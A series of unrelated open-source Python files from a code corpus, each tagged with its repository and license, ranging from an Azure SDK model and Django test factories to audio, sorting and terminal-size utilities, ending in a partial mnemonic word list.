return NegativeSamplingFunction(sampler, sample_size)(x, t, W)
| AlpacaDB/chainer | chainer/functions/loss/negative_sampling.py | Python | mit | 6,667 |
# ncd-dcb.py
#
# Use Cilibrasi and Vitanyi's Normalized Compression Distance
# to cluster a randomly chosen sample of entries from the
# Dictionary of Canadian Biography volume 1
#
# wjt
# http://digitalhistoryhacks.blogspot.com
#
# 26 jun 2007
import bz2
import random
pathstring = 'C:\Documents and Settings\HP_Administrator\My Documents\digital-history-datasets\DCB-txt\DCB-v01-txt'
# Function to calculate the NCD of two files
def ncd(filex, filey):
xbytes = open(filex, 'r').read()
ybytes = open(filey, 'r').read()
xybytes = xbytes + ybytes
cx = bz2.compress(xbytes)
cy = bz2.compress(ybytes)
cxy = bz2.compress(xybytes)
if len(cy) > len(cx):
n = (len(cxy) - len(cx)) / float(len(cy))
else:
n = (len(cxy) - len(cy)) / float(len(cx))
return n
# Randomly select 100 biographies from DCB vol 1 (nos. 34123-34714)
volume1 = range(34123, 34714)
selection = random.sample(volume1, 100)
# For each unique pair, calculate NCD
outfile = open('ncd-dcb.txt', 'w')
for i in range(0, len(selection)-1):
print i
for j in selection[i+1:]:
fx = pathstring + '\\' + str(selection[i]) + '.txt'
fy = pathstring + '\\' + str(j) + '.txt'
outfile.write(str(selection[i]) + ", " + str(j) + ", " + str(ncd(fx, fy)) + "\n")
outfile.close()
| williamjturkel/Digital-History-Hacks--2005-08- | ncd-dcb.py | Python | mit | 1,364 |
from __future__ import unicode_literals
from pre_commit.languages import helpers
from pre_commit.xargs import xargs
ENVIRONMENT_DIR = None
get_default_version = helpers.basic_get_default_version
healthy = helpers.basic_healthy
install_environment = helpers.no_install
def run_hook(repo_cmd_runner, hook, file_args):
cmd = helpers.to_cmd(hook)
cmd = (repo_cmd_runner.prefix_dir + cmd[0],) + cmd[1:]
return xargs(cmd, file_args)
| Lucas-C/pre-commit | pre_commit/languages/script.py | Python | mit | 444 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class AvailabilitySet(Resource):
"""Create or update availability set parameters.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Resource Id
:vartype id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param platform_update_domain_count: Update Domain count.
:type platform_update_domain_count: int
:param platform_fault_domain_count: Fault Domain count.
:type platform_fault_domain_count: int
:param virtual_machines: A list of references to all virtual machines in
the availability set.
:type virtual_machines: list of :class:`SubResource
<azure.mgmt.compute.models.SubResource>`
:ivar statuses: The resource status information.
:vartype statuses: list of :class:`InstanceViewStatus
<azure.mgmt.compute.models.InstanceViewStatus>`
:param managed: If the availability set supports managed disks.
:type managed: bool
:param sku: Sku of the availability set
:type sku: :class:`Sku <azure.mgmt.compute.models.Sku>`
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
'statuses': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'platform_update_domain_count': {'key': 'properties.platformUpdateDomainCount', 'type': 'int'},
'platform_fault_domain_count': {'key': 'properties.platformFaultDomainCount', 'type': 'int'},
'virtual_machines': {'key': 'properties.virtualMachines', 'type': '[SubResource]'},
'statuses': {'key': 'properties.statuses', 'type': '[InstanceViewStatus]'},
'managed': {'key': 'properties.managed', 'type': 'bool'},
'sku': {'key': 'sku', 'type': 'Sku'},
}
def __init__(self, location, tags=None, platform_update_domain_count=None, platform_fault_domain_count=None, virtual_machines=None, managed=None, sku=None):
super(AvailabilitySet, self).__init__(location=location, tags=tags)
self.platform_update_domain_count = platform_update_domain_count
self.platform_fault_domain_count = platform_fault_domain_count
self.virtual_machines = virtual_machines
self.statuses = None
self.managed = managed
self.sku = sku
| rjschwei/azure-sdk-for-python | azure-mgmt-compute/azure/mgmt/compute/models/availability_set.py | Python | mit | 3,239 |
from pydub import *
class AudioMerger:
voice_tags = ["one", "two", "three", "four", "five", "ten", "RUN", "relax", "completed"]
def __init__(self, music):
self.music = music
self.additionalGain = 8
self.voices={}
for voice in self.voice_tags:
sound = AudioSegment.from_file('voices/' + voice + '.wav')
sound += self.additionalGain
self.voices[voice] = sound
def addCountdown(self, startTime, isRun = True):
for i in range(1, 6):
voice = self.voices[self.voice_tags[i - 1]]
self.music = self.music.overlay(voice, position = (startTime - i) * 1000)
self.music = self.music.overlay(self.voices["ten"], position = (startTime - 10) * 1000)
voice = self.voices["RUN" if isRun else "relax"]
self.music = self.music.overlay(voice, position = startTime * 1000)
def addCompleted(self, startTimeSec):
self.music = self.music.overlay(self.voices["completed"], position = (startTimeSec * 1000))
def exportMusic(self, fname):
self.music.export(fname + ".mp3", format="mp3")
| gyimothilaszlo/interval-music-maker | AudioMerger.py | Python | mit | 1,005 |
import factory
from ...models import Dashboard, Link, ModuleType, Module
from ....organisation.tests.factories import NodeFactory, NodeTypeFactory
class DashboardFactory(factory.DjangoModelFactory):
class Meta:
model = Dashboard
status = 'published'
title = "title"
slug = factory.Sequence(lambda n: 'slug%s' % n)
class LinkFactory(factory.DjangoModelFactory):
class Meta:
model = Link
url = factory.Sequence(lambda n: 'https://www.gov.uk/link-%s' % n)
title = 'Link title'
link_type = 'transaction'
dashboard = factory.SubFactory(DashboardFactory)
class ModuleTypeFactory(factory.DjangoModelFactory):
class Meta:
model = ModuleType
name = factory.Sequence(lambda n: 'name %s' % n)
schema = {}
class ModuleFactory(factory.DjangoModelFactory):
class Meta:
model = Module
type = factory.SubFactory(ModuleTypeFactory)
dashboard = factory.SubFactory(DashboardFactory)
slug = factory.Sequence(lambda n: 'slug{}'.format(n))
title = 'title'
info = []
options = {}
order = factory.Sequence(lambda n: n)
class DepartmentTypeFactory(NodeTypeFactory):
name = 'department'
class AgencyTypeFactory(NodeTypeFactory):
name = 'agency'
class ServiceTypeFactory(NodeTypeFactory):
name = 'service'
class DepartmentFactory(NodeFactory):
name = factory.Sequence(lambda n: 'department-%s' % n)
typeOf = factory.SubFactory(DepartmentTypeFactory)
class AgencyFactory(NodeFactory):
name = factory.Sequence(lambda n: 'agency-%s' % n)
typeOf = factory.SubFactory(AgencyTypeFactory)
class AgencyWithDepartmentFactory(AgencyFactory):
parent = factory.SubFactory(DepartmentFactory)
class ServiceFactory(NodeFactory):
parent = factory.SubFactory(AgencyWithDepartmentFactory)
name = factory.Sequence(lambda n: 'service-%s' % n)
typeOf = factory.SubFactory(ServiceTypeFactory)
| alphagov/stagecraft | stagecraft/apps/dashboards/tests/factories/factories.py | Python | mit | 1,931 |
#!/usr/bin/env python3
'''A simple implementation of a sorting algorithm, meant to allow
people to manually rank a list of items using whatever subjective or
objective criteria they want.
This program can be called as a script and used interactively. You
can provide the list of things to sort as command line arguments, or
if there are no arguments provided, you can provide the list in stdin,
one item per line.
Example run:
$ ./sort.py 'ice cream' falafel hamburgers pizza
Which is greater, falafel or ice cream (<, =, or >)? <
Which is greater, hamburgers or ice cream (<, =, or >)? <
Which is greater, hamburgers or falafel (<, =, or >)? >
Which is greater, pizza or hamburgers (<, =, or >)? >
Which is greater, pizza or ice cream (<, =, or >)? <
* ice cream
* pizza
* hamburgers
* falafel
Author: Adam Mesha <adam@mesha.org>
License: MIT
'''
from functools import cmp_to_key
class memoize:
'''We really want to be sure that we don't ask people to compare the
same two items twice, so we cache the result.
'''
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
key = tuple(args)
if key not in self.cache:
self.cache[key] = self.func(*args)
return self.cache[key]
@memoize
def cmpfunc(a, b):
result = None
s = 'Which is greater, {a} or {b} (<, =, or >)? '.format(a=a, b=b)
while result is None or result not in '<=>':
result = input(s).strip()
return '<=>'.index(result) - 1
keyfunc = cmp_to_key(cmpfunc)
def binary_insertion_sort(seq, keyfunc):
'''Insertion sort, using binary search to insert each element. Runs
in O(n**2) time, but the use case is when a human is manually
deciding on the ordering, so the most important thing is to reduce
the number of comparisons.
'''
def mv(srcidx, dstidx):
while srcidx > dstidx:
seq[srcidx], seq[srcidx - 1] = seq[srcidx - 1], seq[srcidx]
srcidx -= 1
i = 1
while i < len(seq):
lower = 0; upper = i
while lower < upper:
j = (upper + lower) // 2
key1, key2 = keyfunc(seq[i]), keyfunc(seq[j])
if key1 == key2:
mv(i, j+1) # XXX this is not stable
i += 1
break
if key1 < key2:
upper = j
else: # >
lower = j + 1
else:
mv(i, upper)
i += 1
class SortableWithHeuristic:
def __init__(self, val, heur):
self.val = val
self.heur = heur
def __str__(self):
return '{val}: {heur}'.format(val=self.val, heur=self.heur)
def __repr__(self):
return '{}(val={}, heur={})'.format(self.__class__.__name__,
repr(self.val),
repr(self.heur))
def get_heuristic_func(val):
result = None
s = 'Give an approximate numeric score to item {}: '.format(val)
while result is None:
try:
result = float(input(s).strip())
except ValueError:
pass
return result
def heuristic_sort(seq, get_heuristic_func, cmpfunc):
def swap(a, b):
seq[a], seq[b] = seq[b], seq[a]
idx = 0
while idx < len(seq):
val = seq[idx]
heur = get_heuristic_func(val)
seq[idx] = SortableWithHeuristic(val, heur)
# find the current location
j = idx
while j > 0 and seq[j].heur < seq[j-1].heur:
swap(j, j-1)
j -= 1
moved = False
while j < idx and cmpfunc(seq[j].val, seq[j+1].val) == 1:
swap(j, j+1)
j += 1
moved = True
if not moved:
while j > 0 and cmpfunc(seq[j].val, seq[j-1].val) == -1:
swap(j, j-1)
j -= 1
if 0 < j < idx:
seq[j].heur = (seq[j-1].heur + seq[j+1].heur) / 2
elif idx > 0:
if j == 0 and seq[j].heur > seq[j+1].heur:
seq[j].heur = seq[j+1].heur - 1
elif j == idx and seq[j].heur < seq[j-1].heur:
seq[j].heur = seq[j-1].heur + 1
idx += 1
def main():
import sys
seq = []
if len(sys.argv) > 1:
seq.extend(sys.argv[1:])
if not seq:
seq.extend(x.strip() for x in sys.stdin.readlines())
heuristic_sort(seq, get_heuristic_func, cmpfunc)
print('\n'.join('* {}'.format(item) for item in reversed(seq)))
if __name__ == '__main__':
main()
| sagittarian/personal-sort | sort.py | Python | mit | 4,539 |
import click
from twentyfourhourvideo import video
@click.command(help='Plays a video.')
@click.argument('input', type=click.Path())
def main(input):
video.play(input)
| xsteadfastx/24hourvideo | twentyfourhourvideo/cli.py | Python | mit | 175 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, division
import os
import shlex
import struct
import platform
import subprocess
def get_terminal_size():
""" get_terminal_size()
- get width and height of console
- works on linux,os x,windows,cygwin(windows)
originally retrieved from:
http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
"""
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in ['Linux', 'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/
# how-do-i-find-the-width-height-of-a-terminal-window
try:
cols = int(subprocess.check_call(shlex.split('tput cols')))
rows = int(subprocess.check_call(shlex.split('tput lines')))
return (cols, rows)
except:
pass
def _get_terminal_size_linux():
import os
env = os.environ
def ioctl_GWINSZ(fd):
try:
import fcntl, termios, struct, os
cr = struct.unpack(b'hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
b'1234'))
except:
return
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
return int(cr[1]), int(cr[0])
| concordusapps/pytest-bench | pytest_bench/terminal.py | Python | mit | 2,626 |
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.platform.resource_loader import get_data_files_path
from tensorflow.python.platform.resource_loader import get_path_to_datafile
from tensorflow.python.platform.resource_loader import get_root_dir_with_all_resources
from tensorflow.python.platform.resource_loader import load_resource
from tensorflow.python.platform.resource_loader import readahead_file_path | ryfeus/lambda-packs | Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/resource_loader/__init__.py | Python | mit | 532 |
words = [
'abandon',
'ability',
'able',
'about',
'above',
'absent',
'absorb',
'abstract',
'absurd',
'abuse',
'access',
'accident',
'account',
'accuse',
'achieve',
'acid',
'acoustic',
'acquire',
'across',
'act',
'action',
'actor',
'actress',
'actual',
'adapt',
'add',
'addict',
'address',
'adjust',
'admit',
'adult',
'advance',
'advice',
'aerobic',
'affair',
'afford',
'afraid',
'again',
'age',
'agent',
'agree',
'ahead',
'aim',
'air',
'airport',
'aisle',
'alarm',
'album',
'alcohol',
'alert',
'alien',
'all',
'alley',
'allow',
'almost',
'alone',
'alpha',
'already',
'also',
'alter',
'always',
'amateur',
'amazing',
'among',
'amount',
'amused',
'analyst',
'anchor',
'ancient',
'anger',
'angle',
'angry',
'animal',
'ankle',
'announce',
'annual',
'another',
'answer',
'antenna',
'antique',
'anxiety',
'any',
'apart',
'apology',
'appear',
'apple',
'approve',
'april',
'arch',
'arctic',
'area',
'arena',
'argue',
'arm',
'armed',
'armor',
'army',
'around',
'arrange',
'arrest',
'arrive',
'arrow',
'art',
'artefact',
'artist',
'artwork',
'ask',
'aspect',
'assault',
'asset',
'assist',
'assume',
'asthma',
'athlete',
'atom',
'attack',
'attend',
'attitude',
'attract',
'auction',
'audit',
'august',
'aunt',
'author',
'auto',
'autumn',
'average',
'avocado',
'avoid',
'awake',
'aware',
'away',
'awesome',
'awful',
'awkward',
'axis',
'baby',
'bachelor',
'bacon',
'badge',
'bag',
'balance',
'balcony',
'ball',
'bamboo',
'banana',
'banner',
'bar',
'barely',
'bargain',
'barrel',
'base',
'basic',
'basket',
'battle',
'beach',
'bean',
'beauty',
'because',
'become',
'beef',
'before',
'begin',
'behave',
'behind',
'believe',
'below',
'belt',
'bench',
'benefit',
'best',
'betray',
'better',
'between',
'beyond',
'bicycle',
'bid',
'bike',
'bind',
'biology',
'bird',
'birth',
'bitter',
'black',
'blade',
'blame',
'blanket',
'blast',
'bleak',
'bless',
'blind',
'blood',
'blossom',
'blouse',
'blue',
'blur',
'blush',
'board',
'boat',
'body',
'boil',
'bomb',
'bone',
'bonus',
'book',
'boost',
'border',
'boring',
'borrow',
'boss',
'bottom',
'bounce',
'box',
'boy',
'bracket',
'brain',
'brand',
'brass',
'brave',
'bread',
'breeze',
'brick',
'bridge',
'brief',
'bright',
'bring',
'brisk',
'broccoli',
'broken',
'bronze',
'broom',
'brother',
'brown',
'brush',
'bubble',
'buddy',
'budget',
'buffalo',
'build',
'bulb',
'bulk',
'bullet',
'bundle',
'bunker',
'burden',
'burger',
'burst',
'bus',
'business',
'busy',
'butter',
'buyer',
'buzz',
'cabbage',
'cabin',
'cable',
'cactus',
'cage',
'cake',
'call',
'calm',
'camera',
'camp',
'can',
'canal',
'cancel',
'candy',
'cannon',
'canoe',
'canvas',
'canyon',
'capable',
'capital',
'captain',
'car',
'carbon',
'card',
'cargo',
'carpet',
'carry',
'cart',
'case',
'cash',
'casino',
'castle',
'casual',
'cat',
'catalog',
'catch',
'category',
'cattle',
'caught',
'cause',
'caution',
'cave',
'ceiling',
'celery',
'cement',
'census',
'century',
'cereal',
'certain',
'chair',
'chalk',
'champion',
'change',
'chaos',
'chapter',
'charge',
'chase',
'chat',
'cheap',
'check',
'cheese',
'chef',
'cherry',
'chest',
'chicken',
'chief',
'child',
'chimney',
'choice',
'choose',
'chronic',
'chuckle',
'chunk',
'churn',
'cigar',
'cinnamon',
'circle',
'citizen',
'city',
'civil',
'claim',
'clap',
'clarify',
'claw',
'clay',
'clean',
'clerk',
'clever',
'click',
'client',
'cliff',
'climb',
'clinic',
'clip',
'clock',
'clog',
'close',
'cloth',
'cloud',
'clown',
'club',
'clump',
'cluster',
'clutch',
'coach',
'coast',
'coconut',
'code',
'coffee',
'coil',
'coin',
'collect',
'color',
'column',
'combine',
'come',
'comfort',
'comic',
'common',
'company',
'concert',
'conduct',
'confirm',
'congress',
'connect',
'consider',
'control',
'convince',
'cook',
'cool',
'copper',
'copy',
'coral',
'core',
'corn',
'correct',
'cost',
'cotton',
'couch',
'country',
'couple',
'course',
'cousin',
'cover',
'coyote',
'crack',
'cradle',
'craft',
'cram',
'crane',
'crash',
'crater',
'crawl',
'crazy',
'cream',
'credit',
'creek',
'crew',
'cricket',
'crime',
'crisp',
'critic',
'crop',
'cross',
'crouch',
'crowd',
'crucial',
'cruel',
'cruise',
'crumble',
'crunch',
'crush',
'cry',
'crystal',
'cube',
'culture',
'cup',
'cupboard',
'curious',
'current',
'curtain',
'curve',
'cushion',
'custom',
'cute',
'cycle',
'dad',
'damage',
'damp',
'dance',
'danger',
'daring',
'dash',
'daughter',
'dawn',
'day',
'deal',
'debate',
'debris',
'decade',
'december',
'decide',
'decline',
'decorate',
'decrease',
'deer',
'defense',
'define',
'defy',
'degree',
'delay',
'deliver',
'demand',
'demise',
'denial',
'dentist',
'deny',
'depart',
'depend',
'deposit',
'depth',
'deputy',
'derive',
'describe',
'desert',
'design',
'desk',
'despair',
'destroy',
'detail',
'detect',
'develop',
'device',
'devote',
'diagram',
'dial',
'diamond',
'diary',
'dice',
'diesel',
'diet',
'differ',
'digital',
'dignity',
'dilemma',
'dinner',
'dinosaur',
'direct',
'dirt',
'disagree',
'discover',
'disease',
'dish',
'dismiss',
'disorder',
'display',
'distance',
'divert',
'divide',
'divorce',
'dizzy',
'doctor',
'document',
'dog',
'doll',
'dolphin',
'domain',
'donate',
'donkey',
'donor',
'door',
'dose',
'double',
'dove',
'draft',
'dragon',
'drama',
'drastic',
'draw',
'dream',
'dress',
'drift',
'drill',
'drink',
'drip',
'drive',
'drop',
'drum',
'dry',
'duck',
'dumb',
'dune',
'during',
'dust',
'dutch',
'duty',
'dwarf',
'dynamic',
'eager',
'eagle',
'early',
'earn',
'earth',
'easily',
'east',
'easy',
'echo',
'ecology',
'economy',
'edge',
'edit',
'educate',
'effort',
'egg',
'eight',
'either',
'elbow',
'elder',
'electric',
'elegant',
'element',
'elephant',
'elevator',
'elite',
'else',
'embark',
'embody',
'embrace',
'emerge',
'emotion',
'employ',
'empower',
'empty',
'enable',
'enact',
'end',
'endless',
'endorse',
'enemy',
'energy',
'enforce',
'engage',
'engine',
'enhance',
'enjoy',
'enlist',
'enough',
'enrich',
'enroll',
'ensure',
'enter',
'entire',
'entry',
'envelope',
'episode',
'equal',
'equip',
'era',
'erase',
'erode',
'erosion',
'error',
'erupt',
'escape',
'essay',
'essence',
'estate',
'eternal',
'ethics',
'evidence',
'evil',
'evoke',
'evolve',
'exact',
'example',
'excess',
'exchange',
'excite',
'exclude',
'excuse',
'execute',
'exercise',
'exhaust',
'exhibit',
'exile',
'exist',
'exit',
'exotic',
'expand',
'expect',
'expire',
'explain',
'expose',
'express',
'extend',
'extra',
'eye',
'eyebrow',
'fabric',
'face',
'faculty',
'fade',
'faint',
'faith',
'fall',
'false',
'fame',
'family',
'famous',
'fan',
'fancy',
'fantasy',
'farm',
'fashion',
'fat',
'fatal',
'father',
'fatigue',
'fault',
'favorite',
'feature',
'february',
'federal',
'fee',
'feed',
'feel',
'female',
'fence',
'festival',
'fetch',
'fever',
'few',
'fiber',
'fiction',
'field',
'figure',
'file',
'film',
'filter',
'final',
'find',
'fine',
'finger',
'finish',
'fire',
'firm',
'first',
'fiscal',
'fish',
'fit',
'fitness',
'fix',
'flag',
'flame',
'flash',
'flat',
'flavor',
'flee',
'flight',
'flip',
'float',
'flock',
'floor',
'flower',
'fluid',
'flush',
'fly',
'foam',
'focus',
'fog',
'foil',
'fold',
'follow',
'food',
'foot',
'force',
'forest',
'forget',
'fork',
'fortune',
'forum',
'forward',
'fossil',
'foster',
'found',
'fox',
'fragile',
'frame',
'frequent',
'fresh',
'friend',
'fringe',
'frog',
'front',
'frost',
'frown',
'frozen',
'fruit',
'fuel',
'fun',
'funny',
'furnace',
'fury',
'future',
'gadget',
'gain',
'galaxy',
'gallery',
'game',
'gap',
'garage',
'garbage',
'garden',
'garlic',
'garment',
'gas',
'gasp',
'gate',
'gather',
'gauge',
'gaze',
'general',
'genius',
'genre',
'gentle',
'genuine',
'gesture',
'ghost',
'giant',
'gift',
'giggle',
'ginger',
'giraffe',
'girl',
'give',
'glad',
'glance',
'glare',
'glass',
'glide',
'glimpse',
'globe',
'gloom',
'glory',
'glove',
'glow',
'glue',
'goat',
'goddess',
'gold',
'good',
'goose',
'gorilla',
'gospel',
'gossip',
'govern',
'gown',
'grab',
'grace',
'grain',
'grant',
'grape',
'grass',
'gravity',
'great',
'green',
'grid',
'grief',
'grit',
'grocery',
'group',
'grow',
'grunt',
'guard',
'guess',
'guide',
'guilt',
'guitar',
'gun',
'gym',
'habit',
'hair',
'half',
'hammer',
'hamster',
'hand',
'happy',
'harbor',
'hard',
'harsh',
'harvest',
'hat',
'have',
'hawk',
'hazard',
'head',
'health',
'heart',
'heavy',
'hedgehog',
'height',
'hello',
'helmet',
'help',
'hen',
'hero',
'hidden',
'high',
'hill',
'hint',
'hip',
'hire',
'history',
'hobby',
'hockey',
'hold',
'hole',
'holiday',
'hollow',
'home',
'honey',
'hood',
'hope',
'horn',
'horror',
'horse',
'hospital',
'host',
'hotel',
'hour',
'hover',
'hub',
'huge',
'human',
'humble',
'humor',
'hundred',
'hungry',
'hunt',
'hurdle',
'hurry',
'hurt',
'husband',
'hybrid',
'ice',
'icon',
'idea',
'identify',
'idle',
'ignore',
'ill',
'illegal',
'illness',
'image',
'imitate',
'immense',
'immune',
'impact',
'impose',
'improve',
'impulse',
'inch',
'include',
'income',
'increase',
'index',
'indicate',
'indoor',
'industry',
'infant',
'inflict',
'inform',
'inhale',
'inherit',
'initial',
'inject',
'injury',
'inmate',
'inner',
'innocent',
'input',
'inquiry',
'insane',
'insect',
'inside',
'inspire',
'install',
'intact',
'interest',
'into',
'invest',
'invite',
'involve',
'iron',
'island',
'isolate',
'issue',
'item',
'ivory',
'jacket',
'jaguar',
'jar',
'jazz',
'jealous',
'jeans',
'jelly',
'jewel',
'job',
'join',
'joke',
'journey',
'joy',
'judge',
'juice',
'jump',
'jungle',
'junior',
'junk',
'just',
'kangaroo',
'keen',
'keep',
'ketchup',
'key',
'kick',
'kid',
'kidney',
'kind',
'kingdom',
'kiss',
'kit',
'kitchen',
'kite',
'kitten',
'kiwi',
'knee',
'knife',
'knock',
'know',
'lab',
'label',
'labor',
'ladder',
'lady',
'lake',
'lamp',
'language',
'laptop',
'large',
'later',
'latin',
'laugh',
'laundry',
'lava',
'law',
'lawn',
'lawsuit',
'layer',
'lazy',
'leader',
'leaf',
'learn',
'leave',
'lecture',
'left',
'leg',
'legal',
'legend',
'leisure',
'lemon',
'lend',
'length',
'lens',
'leopard',
'lesson',
'letter',
'level',
'liar',
'liberty',
'library',
'license',
'life',
'lift',
'light',
'like',
'limb',
'limit',
'link',
'lion',
'liquid',
'list',
'little',
'live',
'lizard',
'load',
'loan',
'lobster',
'local',
'lock',
'logic',
'lonely',
'long',
'loop',
'lottery',
'loud',
'lounge',
'love',
'loyal',
'lucky',
'luggage',
'lumber',
'lunar',
'lunch',
'luxury',
'lyrics',
'machine',
'mad',
'magic',
'magnet',
'maid',
'mail',
'main',
'major',
'make',
'mammal',
'man',
'manage',
'mandate',
'mango',
'mansion',
'manual',
'maple',
'marble',
'march',
'margin',
'marine',
'market',
'marriage',
'mask',
'mass',
'master',
'match',
'material',
'math',
'matrix',
'matter',
'maximum',
'maze',
'meadow',
'mean',
'measure',
'meat',
'mechanic',
'medal',
'media',
'melody',
'melt',
'member',
'memory',
'mention',
'menu',
'mercy',
'merge',
'merit',
'merry',
'mesh',
'message',
'metal',
'method',
'middle',
'midnight',
'milk',
'million',
'mimic',
'mind',
'minimum',
'minor',
'minute',
'miracle',
'mirror',
'misery',
'miss',
'mistake',
'mix',
'mixed',
'mixture',
'mobile',
'model',
'modify',
'mom',
'moment',
'monitor',
'monkey',
'monster',
'month',
'moon',
'moral',
'more',
'morning',
'mosquito',
'mother',
'motion',
'motor',
'mountain',
'mouse',
'move',
'movie',
'much',
'muffin',
'mule',
'multiply',
'muscle',
'museum',
'mushroom',
'music',
'must',
'mutual',
'myself',
'mystery',
'myth',
'naive',
'name',
'napkin',
'narrow',
'nasty',
'nation',
'nature',
'near',
'neck',
'need',
'negative',
'neglect',
'neither',
'nephew',
'nerve',
'nest',
'net',
'network',
'neutral',
'never',
'news',
'next',
'nice',
'night',
'noble',
'noise',
'nominee',
'noodle',
'normal',
'north',
'nose',
'notable',
'note',
'nothing',
'notice',
'novel',
'now',
'nuclear',
'number',
'nurse',
'nut',
'oak',
'obey',
'object',
'oblige',
'obscure',
'observe',
'obtain',
'obvious',
'occur',
'ocean',
'october',
'odor',
'off',
'offer',
'office',
'often',
'oil',
'okay',
'old',
'olive',
'olympic',
'omit',
'once',
'one',
'onion',
'online',
'only',
'open',
'opera',
'opinion',
'oppose',
'option',
'orange',
'orbit',
'orchard',
'order',
'ordinary',
'organ',
'orient',
'original',
'orphan',
'ostrich',
'other',
'outdoor',
'outer',
'output',
'outside',
'oval',
'oven',
'over',
'own',
'owner',
'oxygen',
'oyster',
'ozone',
'pact',
'paddle',
'page',
'pair',
'palace',
'palm',
'panda',
'panel',
'panic',
'panther',
'paper',
'parade',
'parent',
'park',
'parrot',
'party',
'pass',
'patch',
'path',
'patient',
'patrol',
'pattern',
'pause',
'pave',
'payment',
'peace',
'peanut',
'pear',
'peasant',
'pelican',
'pen',
'penalty',
'pencil',
'people',
'pepper',
'perfect',
'permit',
'person',
'pet',
'phone',
'photo',
'phrase',
'physical',
'piano',
'picnic',
'picture',
'piece',
'pig',
'pigeon',
'pill',
'pilot',
'pink',
'pioneer',
'pipe',
'pistol',
'pitch',
'pizza',
'place',
'planet',
'plastic',
'plate',
'play',
'please',
'pledge',
'pluck',
'plug',
'plunge',
'poem',
'poet',
'point',
'polar',
'pole',
'police',
'pond',
'pony',
'pool',
'popular',
'portion',
'position',
'possible',
'post',
'potato',
'pottery',
'poverty',
'powder',
'power',
'practice',
'praise',
'predict',
'prefer',
'prepare',
'present',
'pretty',
'prevent',
'price',
'pride',
'primary',
'print',
'priority',
'prison',
'private',
'prize',
'problem',
'process',
'produce',
'profit',
'program',
'project',
'promote',
'proof',
'property',
'prosper',
'protect',
'proud',
'provide',
'public',
'pudding',
'pull',
'pulp',
'pulse',
'pumpkin',
'punch',
'pupil',
'puppy',
'purchase',
'purity',
'purpose',
'purse',
'push',
'put',
'puzzle',
'pyramid',
'quality',
'quantum',
'quarter',
'question',
'quick',
'quit',
'quiz',
'quote',
'rabbit',
'raccoon',
'race',
'rack',
'radar',
'radio',
'rail',
'rain',
'raise',
'rally',
'ramp',
'ranch',
'random',
'range',
'rapid',
'rare',
'rate',
'rather',
'raven',
'raw',
'razor',
'ready',
'real',
'reason',
'rebel',
'rebuild',
'recall',
'receive',
'recipe',
'record',
'recycle',
'reduce',
'reflect',
'reform',
'refuse',
'region',
'regret',
'regular',
'reject',
'relax',
'release',
'relief',
'rely',
'remain',
'remember',
'remind',
'remove',
'render',
'renew',
'rent',
'reopen',
'repair',
'repeat',
'replace',
'report',
'require',
'rescue',
'resemble',
'resist',
'resource',
'response',
'result',
'retire',
'retreat',
'return',
'reunion',
'reveal',
'review',
'reward',
'rhythm',
'rib',
'ribbon',
'rice',
'rich',
'ride',
'ridge',
'rifle',
'right',
'rigid',
'ring',
'riot',
'ripple',
'risk',
'ritual',
'rival',
'river',
'road',
'roast',
'robot',
'robust',
'rocket',
'romance',
'roof',
'rookie',
'room',
'rose',
'rotate',
'rough',
'round',
'route',
'royal',
'rubber',
'rude',
'rug',
'rule',
'run',
'runway',
'rural',
'sad',
'saddle',
'sadness',
'safe',
'sail',
'salad',
'salmon',
'salon',
'salt',
'salute',
'same',
'sample',
'sand',
'satisfy',
'satoshi',
'sauce',
'sausage',
'save',
'say',
'scale',
'scan',
'scare',
'scatter',
'scene',
'scheme',
'school',
'science',
'scissors',
'scorpion',
'scout',
'scrap',
'screen',
'script',
'scrub',
'sea',
'search',
'season',
'seat',
'second',
'secret',
'section',
'security',
'seed',
'seek',
'segment',
'select',
'sell',
'seminar',
'senior',
'sense',
'sentence',
'series',
'service',
'session',
'settle',
'setup',
'seven',
'shadow',
'shaft',
'shallow',
'share',
'shed',
'shell',
'sheriff',
'shield',
'shift',
'shine',
'ship',
'shiver',
'shock',
'shoe',
'shoot',
'shop',
'short',
'shoulder',
'shove',
'shrimp',
